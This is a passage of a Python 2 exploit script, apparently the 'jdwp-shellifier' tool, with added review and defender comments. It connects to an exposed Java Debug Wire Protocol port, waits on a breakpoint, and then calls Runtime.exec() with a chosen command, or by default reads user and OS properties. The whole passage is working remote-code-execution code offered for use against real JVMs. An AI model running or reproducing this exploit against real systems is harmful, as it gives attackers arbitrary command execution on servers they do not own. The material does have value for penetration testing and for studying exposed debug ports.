                    # Tagged value: first byte selects the encoding.
                    t = ord(struct.unpack(">c", buf[index])[0])
                    if t == 115:
                        # 's': an 8-byte string object id, resolved via a
                        # second round trip.
                        s = self.solve_string(buf[index+1:index+9])
                        data[name] = s
                        index+=9
                    elif t == 73:
                        # 'I': 4-byte int.
                        data[name] = struct.unpack(">I", buf[index+1:index+5])[0]
                        # NOTE(review): this rebinds buf to a tuple and resets
                        # index, so any following format would fail; looks
                        # unintended but only getvalue() uses 'Z', with a
                        # single format, so it is never reached in practice.
                        buf = struct.unpack(">I", buf[index+5:index+9])
                        index=0

                else:
                    print "Error"
                    exit(1)

            entries.append( data )

        return entries

    def format(self, fmt, value):
        """Pack an id of size `fmt` ("L"/8 or "I"/4) big-endian; raises otherwise."""
        if fmt == "L" or fmt == 8:
            return struct.pack(">Q", value)
        elif fmt == "I" or fmt == 4:
            return struct.pack(">I", value)

        raise Exception("Unknown format")

    def unformat(self, fmt, value):
        """Inverse of format(): read an id of size `fmt` from the start of `value`."""
        if fmt == "L" or fmt == 8:
            return struct.unpack(">Q", value[:8])[0]
        elif fmt == "I" or fmt == 4:
            return struct.unpack(">I", value[:4])[0]
        else:
            raise Exception("Unknown format")
        return

    def start(self):
        """Connect and populate id sizes, version strings and the class list.

        Order matters: parse_entries() needs the id sizes before any class
        or thread table can be decoded.
        """
        self.handshake(self.host, self.port)
        self.idsizes()
        self.getversion()
        self.allclasses()
        return

    def handshake(self, host, port):
        """Open the TCP connection and exchange the JDWP-Handshake banner.

        Raises Exception on connect failure or if the agent does not echo
        the banner.  On success the socket is stored in self.socket.
        """
        s = socket.socket()
        try:
            s.connect( (host, port) )
        except socket.error as msg:
            raise Exception("Failed to connect: %s" % msg)

        s.send( HANDSHAKE )

        # The agent replies with the same 14 bytes; that echo is the only
        # "authentication" the protocol performs.
        if s.recv( len(HANDSHAKE) ) != HANDSHAKE:
            raise Exception("Failed to handshake")
        else:
            self.socket = s

        return

    def leave(self):
        """Close the socket.  Raises AttributeError if handshake() never succeeded."""
        self.socket.close()
        return

    def getversion(self):
        """VirtualMachine.Version: set description/jdwpMajor/jdwpMinor/vmVersion/vmName."""
        self.socket.sendall( self.create_packet(VERSION_SIG) )
        buf = self.read_reply()
        formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"),
                    ('S', "vmVersion"), ('S', "vmName"), ]
        # Single entry, no leading count.
        for entry in self.parse_entries(buf, formats, False):
            for name,value in entry.iteritems():
                setattr(self, name, value)
        return

    @property
    def version(self):
        """Human-readable "<vmName> - <vmVersion>"; valid after getversion()."""
        return "%s - %s" % (self.vmName, self.vmVersion)

    def idsizes(self):
        """VirtualMachine.IDSizes: learn the byte width of each id type.

        The resulting attributes (fieldIDSize, methodIDSize, objectIDSize,
        referenceTypeIDSize, frameIDSize) are passed as `fmt` to format(),
        unformat() and parse_entries() by every later request.
        """
        self.socket.sendall( self.create_packet(IDSIZES_SIG) )
        buf = self.read_reply()
        formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
                    ("I", "referenceTypeIDSize"), ("I", "frameIDSize") ]
        for entry in self.parse_entries(buf, formats, False):
            for name,value in entry.iteritems():
                setattr(self, name, value)
        return

    def allthreads(self):
        """Return the cached thread list, fetching it once via VirtualMachine.AllThreads.

        NOTE(review): the bare except plus `finally: return` swallows any
        error raised while fetching (including socket errors), and if the
        fetch failed before self.threads was assigned the return itself
        raises AttributeError.
        """
        try:
            getattr(self, "threads")
        except :
            self.socket.sendall( self.create_packet(ALLTHREADS_SIG) )
            buf = self.read_reply()
            formats = [ (self.objectIDSize, "threadId")]
            self.threads = self.parse_entries(buf, formats)
        finally:
            return self.threads

    def get_thread_by_name(self, name):
        """Return the thread entry whose ThreadReference.Name equals `name`, else None."""
        self.allthreads()
        for t in self.threads:
            threadId = self.format(self.objectIDSize, t["threadId"])
            self.socket.sendall( self.create_packet(THREADNAME_SIG, data=threadId) )
            buf = self.read_reply()
            if len(buf) and name == self.readstring(buf):
                return t
        return None

    def allclasses(self):
        """Return the cached class table, fetching it once via VirtualMachine.AllClasses.

        Each entry has refTypeTag, refTypeId, signature (JVM form, e.g.
        "Ljava/lang/Runtime;") and status.  Same bare-except caveat as
        allthreads().
        """
        try:
            getattr(self, "classes")
        except:
            self.socket.sendall( self.create_packet(ALLCLASSES_SIG) )
            buf = self.read_reply()
            formats = [ ('C', "refTypeTag"),
                        (self.referenceTypeIDSize, "refTypeId"),
                        ('S', "signature"),
                        ('I', "status")]
            self.classes = self.parse_entries(buf, formats)

        return self.classes

    def get_class_by_name(self, name):
        """Case-insensitive lookup of a loaded class by JVM signature; None if absent.

        Reads self.classes directly, so allclasses() must have run first.
        """
        for entry in self.classes:
            if entry["signature"].lower() == name.lower() :
                return entry
        return None

    def get_methods(self, refTypeId):
        """ReferenceType.Methods for `refTypeId`, cached in self.methods.

        Returns a list of dicts with methodId, name, signature, modBits.
        """
        if not self.methods.has_key(refTypeId):
            refId = self.format(self.referenceTypeIDSize, refTypeId)
            self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) )
            buf = self.read_reply()
            formats = [ (self.methodIDSize, "methodId"),
                        ('S', "name"),
                        ('S', "signature"),
                        ('I', "modBits")]
            self.methods[refTypeId] = self.parse_entries(buf, formats)
        return self.methods[refTypeId]

    def get_method_by_name(self, name):
        """First cached method (any class, case-insensitive) named `name`, else None.

        NOTE(review): the search spans every class fetched so far, not one
        class, so the result depends on fetch order when several cached
        classes define a method with this name.
        """
        for refId in self.methods.keys():
            for entry in self.methods[refId]:
                if entry["name"].lower() == name.lower() :
                    return entry
        return None

    def getfields(self, refTypeId):
        """ReferenceType.Fields for `refTypeId`, cached in self.fields.

        Returns a list of dicts with fieldId, name, signature, modbits.
        """
        if not self.fields.has_key( refTypeId ):
            refId = self.format(self.referenceTypeIDSize, refTypeId)
            self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) )
            buf = self.read_reply()
            formats = [ (self.fieldIDSize, "fieldId"),
                        ('S', "name"),
                        ('S', "signature"),
                        ('I', "modbits")]
            self.fields[refTypeId] = self.parse_entries(buf, formats)
        return self.fields[refTypeId]

    def getvalue(self, refTypeId, fieldId):
        """ReferenceType.GetValues for one static field; returns {"value": ...}."""
        data = self.format(self.referenceTypeIDSize, refTypeId)
        # Number of fields requested.
        data+= struct.pack(">I", 1)
        data+= self.format(self.fieldIDSize, fieldId)
        self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) )
        buf = self.read_reply()
        formats = [ ("Z", "value") ]
        field = self.parse_entries(buf, formats)[0]
        return field

    def createstring(self, data):
        """VirtualMachine.CreateString: allocate `data` in the target VM.

        Returns a one-element list [{"objId": <string object id>}].
        """
        buf = self.buildstring(data)
        self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) )
        buf = self.read_reply()
        return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)

    def buildstring(self, data):
        """Encode a JDWP string: 4-byte big-endian length then the bytes."""
        return struct.pack(">I", len(data)) + data

    def readstring(self, data):
        """Decode a JDWP string from the start of `data` (inverse of buildstring())."""
        size = struct.unpack(">I", data[:4])[0]
        return data[4:4+size]

    def suspendvm(self):
        """VirtualMachine.Suspend; reply payload discarded."""
        self.socket.sendall( self.create_packet( SUSPENDVM_SIG ) )
        self.read_reply()
        return

    def resumevm(self):
        """VirtualMachine.Resume; reply payload discarded."""
        self.socket.sendall( self.create_packet( RESUMEVM_SIG ) )
        self.read_reply()
        return

    def invokestatic(self, classId, threadId, methId, *args):
        """ClassType.InvokeMethod (static call) on the given suspended thread.

        Each element of `args` must already be an encoded tagged value.
        Returns the raw reply payload: a tagged return value followed by a
        tagged exception reference.
        """
        data = self.format(self.referenceTypeIDSize, classId)
        data+= self.format(self.objectIDSize, threadId)
        data+= self.format(self.methodIDSize, methId)
        data+= struct.pack(">I", len(args))
        for arg in args:
            data+= arg
        # Invoke options (0 = none).
        data+= struct.pack(">I", 0)

        self.socket.sendall( self.create_packet(INVOKESTATICMETHOD_SIG, data=data) )
        buf = self.read_reply()
        return buf

    def invoke(self, objId, threadId, classId, methId, *args):
        """ObjectReference.InvokeMethod (instance call); same conventions as invokestatic()."""
        data = self.format(self.objectIDSize, objId)
        data+= self.format(self.objectIDSize, threadId)
        data+= self.format(self.referenceTypeIDSize, classId)
        data+= self.format(self.methodIDSize, methId)
        data+= struct.pack(">I", len(args))
        for arg in args:
            data+= arg
        # Invoke options (0 = none).
        data+= struct.pack(">I", 0)

        self.socket.sendall( self.create_packet(INVOKEMETHOD_SIG, data=data) )
        buf = self.read_reply()
        return buf

    def solve_string(self, objId):
        """StringReference.Value: fetch the text of an already-encoded string object id.

        Returns "" when the reply carries no payload.
        """
        self.socket.sendall( self.create_packet(STRINGVALUE_SIG, data=objId) )
        buf = self.read_reply()
        if len(buf):
            return self.readstring(buf)
        else:
            return ""

    def query_thread(self, threadId, kind):
        """Send a ThreadReference command `kind` for `threadId`; the reply is discarded."""
        data = self.format(self.objectIDSize, threadId)
        self.socket.sendall( self.create_packet(kind, data=data) )
        buf = self.read_reply()
        return

    def suspend_thread(self, threadId):
        """ThreadReference.Suspend; returns None."""
        return self.query_thread(threadId, THREADSUSPEND_SIG)

    def status_thread(self, threadId):
        """ThreadReference.Status; the status itself is not returned (see query_thread)."""
        return self.query_thread(threadId, THREADSTATUS_SIG)

    def resume_thread(self, threadId):
        """ThreadReference.Resume; returns None."""
        return self.query_thread(threadId, THREADRESUME_SIG)

    def send_event(self, eventCode, *args):
        """EventRequest.Set with suspend policy SUSPEND_ALL.

        `args` are (modifier kind, encoded modifier) pairs.  Returns the
        request id assigned by the agent (4-byte int in the reply).
        """
        data = ""
        data+= chr( eventCode )
        data+= chr( SUSPEND_ALL )
        data+= struct.pack(">I", len(args))

        for kind, option in args:
            data+= chr( kind )
            data+= option

        self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) )
        buf = self.read_reply()
        return struct.unpack(">I", buf)[0]

    def clear_event(self, eventCode, rId):
        """EventRequest.Clear for request `rId` of kind `eventCode`."""
        data = chr(eventCode)
        data+= struct.pack(">I", rId)
        self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) )
        self.read_reply()
        return

    def clear_events(self):
        """EventRequest.ClearAllBreakpoints."""
        self.socket.sendall( self.create_packet(EVENTCLEARALL_SIG) )
        self.read_reply()
        return

    def wait_for_event(self):
        """Block until the next packet arrives and return its payload.

        Event packets are commands sent by the agent, so read_reply()'s
        error-code check does not apply to them (flags != REPLY_PACKET_TYPE).
        """
        buf = self.read_reply()
        return buf

    def parse_event_breakpoint(self, buf, eventId):
        """Pick the breakpoint event matching `eventId` out of a Composite event payload.

        Returns (requestId, threadId, -1) or None when the request id does
        not match.  The fixed offsets (count at 2, request id at 6, thread
        id at 10) assume a single-event composite with the suspend policy
        and event kind in front; `num` is decoded but unused.
        """
        num = struct.unpack(">I", buf[2:6])[0]
        rId = struct.unpack(">I", buf[6:10])[0]
        if rId != eventId:
            return None
        tId = self.unformat(self.objectIDSize, buf[10:10+self.objectIDSize])
        loc = -1 # don't care
        return rId, tId, loc



def runtime_exec(jdwp, args):
    """Drive the session: obtain a suspended thread, then run the chosen action.

    `jdwp` is a started JDWPClient; `args` is the parsed argparse namespace
    extended with break_on_class / break_on_method.  A breakpoint on the
    method named by --break-on is used only to get an application thread
    into the suspended state JDWP requires for method invocation.  Returns
    True on success, False on any lookup failure.
    Defender note: nothing here abuses a flaw in the protocol; every step
    is a documented debugger operation, which is why an exposed listener
    cannot be "patched" short of removing or firewalling it.
    """
    print ("[+] Targeting '%s:%d'" % (args.target, args.port))
    print ("[+] Reading settings for '%s'" % jdwp.version)

    # 1. get Runtime class reference
    runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;")
    if runtimeClass is None:
        print ("[-] Cannot find class Runtime")
        return False
    print ("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"])

    # 2. get getRuntime() meth reference
    jdwp.get_methods(runtimeClass["refTypeId"])
    getRuntimeMeth = jdwp.get_method_by_name("getRuntime")
    if getRuntimeMeth is None:
        print ("[-] Cannot find method Runtime.getRuntime()")
        return False
    print ("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"])

    # 3. setup breakpoint on frequently called method
    c = jdwp.get_class_by_name( args.break_on_class )
    if c is None:
        print("[-] Could not access class '%s'" % args.break_on_class)
        print("[-] It is possible that this class is not used by application")
        print("[-] Test with another one with option `--break-on`")
        return False

    jdwp.get_methods( c["refTypeId"] )
    m = jdwp.get_method_by_name( args.break_on_method )
    if m is None:
        print("[-] Could not access method '%s'" % args.break_on)
        return False

    # Location modifier: type tag, class id, method id, 8-byte code index 0.
    loc = chr( TYPE_CLASS )
    loc+= jdwp.format( jdwp.referenceTypeIDSize, c["refTypeId"] )
    loc+= jdwp.format( jdwp.methodIDSize, m["methodId"] )
    loc+= struct.pack(">II", 0, 0)
    data = [ (MODKIND_LOCATIONONLY, loc), ]
    rId = jdwp.send_event( EVENT_BREAKPOINT, *data )
    print ("[+] Created break event id=%x" % rId)

    # 4. resume vm and wait for event
    jdwp.resumevm()

    print ("[+] Waiting for an event on '%s'" % args.break_on)
    # Loops until an event with our request id arrives; there is no timeout,
    # so a method that is never called keeps this blocked indefinitely.
    while True:
        buf = jdwp.wait_for_event()
        ret = jdwp.parse_event_breakpoint(buf, rId)
        if ret is not None:
            break

    rId, tId, loc = ret
    print ("[+] Received matching event from thread %#x" % tId)

    jdwp.clear_event(EVENT_BREAKPOINT, rId)

    # 5. Now we can execute any code
    # NOTE(review): the return value of either helper is ignored, so the
    # "successfully executed" message below is printed even when they
    # returned False.
    if args.cmd:
        runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"], getRuntimeMeth["methodId"], args.cmd)
    else:
        # by default, only prints out few system properties
        runtime_exec_info(jdwp, tId)

    jdwp.resumevm()

    print ("[!] Command successfully executed")

    return True


def runtime_exec_info(jdwp, threadId):
    #
    # This function calls java.lang.System.getProperties() and
    # displays OS properties (non-intrusive)
    #
    # Actually invokes System.getProperty(name) once per key below, on the
    # suspended thread `threadId`.  Returns True, or False on any failure.
    #
    properties = {"os.name": "Operating System",
                  "java.class.path": "ClassPath",
                  "user.name": "User name",
                  "user.home": "User home directory"
                  }

    systemClass = jdwp.get_class_by_name("Ljava/lang/System;")
    if systemClass is None:
        print ("[-] Cannot find class java.lang.System")
        return False

    jdwp.get_methods(systemClass["refTypeId"])
    getPropertyMeth = jdwp.get_method_by_name("getProperty")
    if getPropertyMeth is None:
        print ("[-] Cannot find method System.getProperty()")
        return False

    for propStr, propDesc in properties.iteritems():
        # The property name must exist as a String object inside the target
        # VM before it can be passed as an argument.
        propObjIds = jdwp.createstring(propStr)
        if len(propObjIds) == 0:
            print ("[-] Failed to allocate command")
            return False
        propObjId = propObjIds[0]["objId"]

        data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, propObjId), ]
        buf = jdwp.invokestatic(systemClass["refTypeId"],
                                threadId,
                                getPropertyMeth["methodId"],
                                *data)
        if buf[0] != chr(TAG_STRING):
            print ("[-] Unexpected returned type: expecting String")
            return False

        retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
        # NOTE(review): uses the module-level `cli` instead of the `jdwp`
        # parameter; works only when called from __main__ and raises
        # NameError otherwise.
        res = cli.solve_string(jdwp.format(jdwp.objectIDSize, retId))
        print ("[+] Found %s '%s'" % (propDesc, res))


    return True


def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, command):
    #
    # This function will invoke command as a payload, which will be running
    # with JVM privilege on host (intrusive).
    #
    # Parameters: a started JDWPClient, the suspended thread id from the
    # breakpoint event, the Runtime class and getRuntime() method ids found
    # by runtime_exec(), and the command string.  Returns True, or False on
    # any failure.  From the monitoring side this is a process spawned by
    # the JVM with the JVM's own credentials, which is the signal to alert on.
    #
    print ("[+] Selected payload '%s'" % command)

    # 1. allocating string containing our command to exec()
    cmdObjIds = jdwp.createstring( command )
    if len(cmdObjIds) == 0:
        print ("[-] Failed to allocate command")
        return False
    cmdObjId = cmdObjIds[0]["objId"]
    print ("[+] Command string object created id:%x" % cmdObjId)

    # 2. use context to get Runtime object
    buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId)
    if buf[0] != chr(TAG_OBJECT):
        print ("[-] Unexpected returned type: expecting Object")
        return False
    rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])

    # NOTE(review): unformat() returns an int, never None, so this branch
    # is dead; a null reference would come back as id 0 instead.
    if rt is None:
        print "[-] Failed to invoke Runtime.getRuntime()"
        return False
    print ("[+] Runtime.getRuntime() returned context id:%#x" % rt)

    # 3. find exec() method
    # Relies on the Runtime method table already being cached by
    # runtime_exec(); get_method_by_name() searches all cached classes.
    execMeth = jdwp.get_method_by_name("exec")
    if execMeth is None:
        print ("[-] Cannot find method Runtime.exec()")
        return False
    print ("[+] found Runtime.exec(): id=%x" % execMeth["methodId"])

    # 4. call exec() in this context with the alloc-ed string
    data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, cmdObjId) ]
    buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data)
    if buf[0] != chr(TAG_OBJECT):
        print ("[-] Unexpected returned type: expecting Object")
        return False

    retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
    print ("[+] Runtime.exec() successful, retId=%x" % retId)

    return True


def str2fqclass(s):
    """Split "pkg.Class.method" into (JVM class signature, method name).

    "java.net.ServerSocket.accept" -> ("Ljava/net/ServerSocket;", "accept").
    Exits the process when `s` contains no dot.
    """
    i = s.rfind('.')
    if i == -1:
        print("Cannot parse path")
        exit(1)

    method = s[i:][1:]
    classname = 'L' + s[:i].replace('.', '/') + ';'
    return classname, method


if __name__ == "__main__":

    parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter )

    parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
    parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")

    parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
                        default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
    # NOTE(review): the help text below was copied from --break-on and
    # describes the wrong option.
    parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
                        help="Specify full path to method to break on")

    args = parser.parse_args()

    # Derived attributes consumed by runtime_exec().
    classname, meth = str2fqclass(args.break_on)
    setattr(args, "break_on_class", classname)
    setattr(args, "break_on_method", meth)

    retcode = 0

    try:
        cli = JDWPClient(args.target, args.port)
        cli.start()

        if runtime_exec(cli, args) == False:
            print ("[-] Exploit failed")
            retcode = 1

    except KeyboardInterrupt:
        pass

    except Exception, e:
        print ("[-] Exception: %s" % e)
        retcode = 1

    finally:
        # NOTE(review): if start() failed before the handshake completed,
        # cli.socket does not exist and this raises AttributeError, masking
        # the original error message.
        cli.leave()

    exit(retcode)
